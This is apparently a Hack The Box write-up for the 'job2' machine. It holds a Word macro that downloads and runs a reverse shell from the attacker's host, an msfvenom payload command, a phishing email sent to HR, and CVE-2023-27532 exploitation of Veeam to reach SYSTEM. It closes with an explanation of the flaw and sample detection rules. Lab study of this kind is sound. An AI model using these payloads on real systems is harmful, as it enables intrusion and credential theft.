htb jobtwo

Information Gathering

# Nmap 7.98 scan initiated Sun Jan  4 14:03:38 2026 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.129.238.35
Nmap scan report for 10.129.238.35
Host is up (0.17s latency).
Not shown: 985 filtered tcp ports (no-response)
PORT      STATE SERVICE              VERSION
22/tcp    open  ssh                  OpenSSH for_Windows_9.5 (protocol 2.0)
25/tcp    open  smtp                 hMailServer smtpd
| smtp-commands: JOB2, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp    open  http                 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
111/tcp   open  rpcbind
135/tcp   open  msrpc                Microsoft Windows RPC
139/tcp   open  netbios-ssn          Microsoft Windows netbios-ssn
443/tcp   open  ssl/https?
| tls-alpn:
|   h2
|_  http/1.1
| ssl-cert: Subject: commonName=www.job2.vl
| Subject Alternative Name: DNS:job2.vl, DNS:www.job2.vl
| Issuer: commonName=www.job2.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-05-09T13:31:40
| Not valid after:  2122-05-09T13:41:37
| MD5:     c9f2 9528 e037 427f 18a4 25df 8a09 9bcb
| SHA-1:   a8ea cfdd 9e76 ba15 d11e 9b86 90b3 91c0 a6d8 6084
|_SHA-256: db18 1035 4d3e bc36 30f4 bf54 0f97 e545 b58c de74 e66a 54f8 fefc 425b b1dc 4afb
|_ssl-date: TLS randomness does not represent time
445/tcp   open  microsoft-ds?
1063/tcp  open  rpcbind
2049/tcp  open  rpcbind
3389/tcp  open  ms-wbt-server        Microsoft Terminal Services
| ssl-cert: Subject: commonName=JOB2
| Issuer: commonName=JOB2
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-10-26T11:44:40
| Not valid after:  2026-04-27T11:44:40
| MD5:     bf8d 2c65 9d12 408e 3c34 855e 2d4c c869
| SHA-1:   8c1b 5175 aa80 1ba5 730d 4ba2 71a6 62a5 c31a b834
|_SHA-256: 3e3c 7325 baeb 35f9 1501 ab98 6577 a9f9 299c ab16 5bc2 97b8 0c9d c27e fa0b 9a9a
|_ssl-date: 2026-01-04T15:06:32+00:00; +1h00m00s from scanner time.
5985/tcp  open  http                 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
10001/tcp open  msexchange-logcopier Microsoft Exchange 2010 log copier
10002/tcp open  msexchange-logcopier Microsoft Exchange 2010 log copier
10003/tcp open  storagecraft-image   StorageCraft Image Manager
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.081 days (since Sun Jan  4 12:09:36 2026)
TCP Sequence Prediction: Difficulty=249 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: JOB2; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2026-01-04T15:05:52
|_  start_date: N/A
|_clock-skew: mean: 59m59s, deviation: 0s, median: 59m59s

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jan  4 14:06:39 2026 -- 1 IP address (1 host up) scanned in 180.97 seconds

Vulnerability Analysis

Visiting https://www.job2.vl/, we can see the following notice:

"If you are interested in this position, please send your CV to hr@job2.vl as a Microsoft Word Document."

Exploitation (User Flag)

Create a Word document in .docm (macro-enabled) format.

Press Alt+F11 to open the VBA editor and enter the macro:

Sub AutoOpen()
  ' Runs automatically when the document is opened with macros enabled.
  ' First call: fetch shell.exe from the attacker host with curl; second call: run it.
  ' Shell() returns immediately, so on the first open the second call fires before the download has finished.
  a = Shell("""curl"" ""10.10.16.21/shell.exe"" ""-o"" ""C:\Windows\tasks\shell.exe""", vbHide)
  b = Shell("C:\Windows\tasks\shell.exe", vbHide)
End Sub

Note: the document has to be sent twice; the first open downloads the file, the second executes it.

Create the reverse shell executable locally with msfvenom (rcat.exe in the original note; the command below names it shell.exe, matching what the macro downloads):

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.21 LPORT=443 -f exe -o shell.exe

Send the email with the document attached:

sendemail -s job2.vl -f "Neobee@gmail.htb" -t hr@job2.vl -m "hey pls check my cv http://10.10.16.21/" -a 1.docm -o tls=no

This yields a shell as job2\julian.

Privilege Escalation (Root Flag)

net users

User accounts for \\

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Ferdinand
Guest                    Julian                   svc_veeam
WDAGUtilityAccount
The command completed with one or more errors.

The svc_veeam account tells us that Veeam Backup & Replication is installed on the target.

Check whether Veeam is actually running:

tasklist /svc | findstr /i "veeam"
tasklist /svc | findstr /i "veeam"
sqlservr.exe                  2464 MSSQL$VEEAMSQL2016
sqlceip.exe                   2764 SQLTELEMETRY$VEEAMSQL2016
Veeam.Backup.Agent.Config     3472 VeeamDistributionSvc
VeeamFilesysVssSvc.exe        3480 VeeamFilesysVssSvc
VeeamDeploymentSvc.exe        3496 VeeamDeploySvc
VeeamTransportSvc.exe         3504 VeeamTransportSvc
VeeamNFSSvc.exe               3512 VeeamNFSSvc
Veeam.Guest.Interaction.P     4008 N/A
Veeam.Backup.Service.exe      3120 VeeamBackupSvc
Veeam.Backup.BrokerServic     6392 VeeamBrokerSvc
Veeam.Backup.ExternalInfr      944 N/A
Veeam.Backup.Manager.exe      3928 N/A
Veeam.Backup.WmiServer.ex     8692 N/A
Veeam.Backup.CatalogDataS     9144 VeeamCatalogSvc
Veeam.Backup.CloudService     7368 VeeamCloudSvc
Veeam.Backup.UIServer.exe     8392 N/A
Veeam.Backup.MountService     7256 VeeamMountSvc

Since the shell can reach the host's local (loopback) network, we can try CVE-2023-27532.

Upload four files:

07/10/2024  11:34 AM         1,841,232 Veeam.Backup.Common.dll
07/10/2024  11:34 AM           430,160 Veeam.Backup.Interaction.MountService.dll
07/10/2024  11:34 AM         4,444,240 Veeam.Backup.Model.dll
07/10/2024  11:34 AM             7,168 VeeamHax.exe

Run the tool against the loopback address:

C:\Users\Julian\Documents>.\VeeamHax.exe --target 127.0.0.1 --cmd C:\Windows\tasks\shell.exe
.\VeeamHax.exe --target 127.0.0.1 --cmd C:\Windows\tasks\shell.exe
Targeting 127.0.0.1:9401

This gives us a shell:

C:\WINDOWS\system32>whoami
whoami
nt authority\system

Lessons Learned

The forgotten .NET Remoting

1. Core background: the forgotten .NET Remoting

To understand this vulnerability, you first need to understand .NET Remoting.

  • What is it? A technology Microsoft introduced in the early days of the .NET Framework (around 2002) that lets program objects in different processes or on different machines talk to each other. Think of it as an old-style implementation of "remote procedure call (RPC)".
  • Why is it dangerous? Microsoft deprecated it years ago and recommends WCF or REST APIs instead. The reason is that .NET Remoting depends heavily on deserialization, and its default configuration usually lacks a strict security boundary.

Veeam's mistake: the core service of Veeam Backup & Replication (VBR), Veeam.Backup.Service.exe, opens a .NET Remoting listener on TCP port 9392 so that its components (the UI console, the mount service, and so on) can communicate with each other.

2. Root cause: unauthenticated API exposure

CVE-2023-27532 is essentially an authentication bypass vulnerability, and it can be exploited in two main directions:

A. Credential dumping - a logic flaw

This is the most common way to exploit it.

  1. Normal flow: an administrator logs in through the console; once the Veeam service has verified their identity, it lets them query the database configuration.
  2. The flaw: Veeam exposes an endpoint named IVeeamService (or a similarly named internal interface) on port 9392. The developers wrongly assumed that only authenticated internal components would ever connect to this port, so certain API calls were never given an identity check.
  3. Attack logic
    • The attacker connects to port 9392.
    • They directly request the CredentialsDbScopeId object.
    • The Veeam service does not check who you are and simply returns the credentials stored in the database (encrypted, but returned nonetheless).
    • Because Veeam's decryption is static (hard-coded or reversible), the attacker can easily decrypt them locally into plaintext passwords (Administrator / SQL passwords).

B. Remote code execution (RCE) - a deserialization flaw

This is the method you just used (getting a shell through port 9401).

  1. Principle: .NET Remoting communication relies on BinaryFormatter. When the server receives a data object from the client, it automatically deserializes it (turns the binary data back into an in-memory object).
  2. The dangerous BinaryFormatter: Microsoft has explicitly warned that BinaryFormatter is unsafe. If an attacker sends a malicious, specially crafted serialized object, the server triggers the malicious code defined inside that object while reconstructing it.
  3. Attack logic
    • Your exploit tool (VeeamHax.exe) connects to the Mount Service (9401).
    • Instead of a normal request, it sends a prepared piece of malicious serialized data (a gadget chain).
    • When the Veeam service tries to read this data, code execution is triggered and the shell.exe you specified runs.

3. Why did the attack succeed against localhost?

This comes down to the security boundaries of the network architecture.

  • External defense: in a real enterprise environment, administrators usually block ports 9392/9401 at the firewall, so an external attacker cannot exploit them directly.
  • Missing internal defense: software, however, usually trusts localhost (127.0.0.1) by default.
  • Attack path
    1. You first obtained the low-privileged user Julian through another vulnerability or a weak password.
    2. Once inside the system, traffic to 127.0.0.1 is usually not filtered by the firewall.
    3. You connected to the vulnerable port through the loopback address; to the Veeam service the request looks as if it came from "another component on the same host", so it gets through more easily (or simply because the port is now reachable at all).
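Detection logic for the two stages of this chain (the Word macro dropper, and the loopback connection to the Veeam remoting port followed by the SYSTEM service launching a dropped binary), as an added example that is not part of the original writeup. The Sysmon-style events, the Office and Veeam install paths, and the rule names are constructed assumptions.

```python
import ntpath
# Names and paths the rules key on (the dropper in this chain used curl.exe and C:\Windows\Tasks).
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
DOWNLOADERS = {"curl.exe", "certutil.exe", "bitsadmin.exe", "powershell.exe"}
VEEAM_REMOTING_PORTS = {9392, 9401}
# Directories a low-privileged user can normally write to (prefix match, case-insensitive).
USER_WRITABLE = ("c:\\windows\\tasks\\", "c:\\windows\\temp\\", "c:\\users\\", "c:\\programdata\\")

def _name(path):
    return ntpath.basename(path).lower()

def _in_user_writable(path):
    return path.lower().startswith(USER_WRITABLE)

def check_process_creation(ev):
    """Sysmon event ID 1: return a rule name if the parent/child pair is suspicious, else None."""
    parent, child = _name(ev["ParentImage"]), _name(ev["Image"])
    if parent in OFFICE_APPS and (child in DOWNLOADERS or _in_user_writable(ev["Image"])):
        return "office-macro-dropper"  # Word -> curl.exe, Word -> C:\Windows\Tasks\shell.exe
    if parent.startswith("veeam.") and _in_user_writable(ev["Image"]):
        return "veeam-service-child-from-user-path"  # SYSTEM service launching a dropped binary
    return None

def check_network_connection(ev):
    """Sysmon event ID 3: flag non-Veeam processes reaching the Veeam remoting ports on loopback."""
    if (ev["DestinationIp"] == "127.0.0.1" and int(ev["DestinationPort"]) in VEEAM_REMOTING_PORTS
            and not _name(ev["Image"]).startswith("veeam.")):
        return "loopback-to-veeam-remoting-port"
    return None

def scan(events):
    """Run both rules over a list of events and return (rule, image) pairs in order."""
    alerts = []
    for ev in events:
        rule = {1: check_process_creation, 3: check_network_connection}.get(ev["EventID"], lambda e: None)(ev)
        if rule:
            alerts.append((rule, ev["Image"]))
    return alerts

# Constructed events mirroring this chain (hypothetical, not logs captured from the box).
WORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
VEEAM_DIR = r"C:\Program Files\Veeam\Backup and Replication\Backup"
SAMPLE_EVENTS = [
    {"EventID": 1, "ParentImage": WORD, "Image": r"C:\Windows\System32\curl.exe"},
    {"EventID": 1, "ParentImage": WORD, "Image": r"C:\Windows\Tasks\shell.exe"},
    {"EventID": 3, "Image": r"C:\Users\Julian\Documents\VeeamHax.exe", "DestinationIp": "127.0.0.1", "DestinationPort": 9401},
    {"EventID": 3, "Image": VEEAM_DIR + r"\Veeam.Backup.Manager.exe", "DestinationIp": "127.0.0.1", "DestinationPort": 9401},  # benign console traffic
    {"EventID": 1, "ParentImage": VEEAM_DIR + r"\Veeam.Backup.Service.exe", "Image": r"C:\Windows\Tasks\shell.exe"},
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\notepad.exe"},  # benign
]
```

Running scan(SAMPLE_EVENTS) flags the two Word children, the VeeamHax.exe loopback connection and the service-spawned shell.exe, while the legitimate console-to-service traffic and the explorer/notepad pair stay silent.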
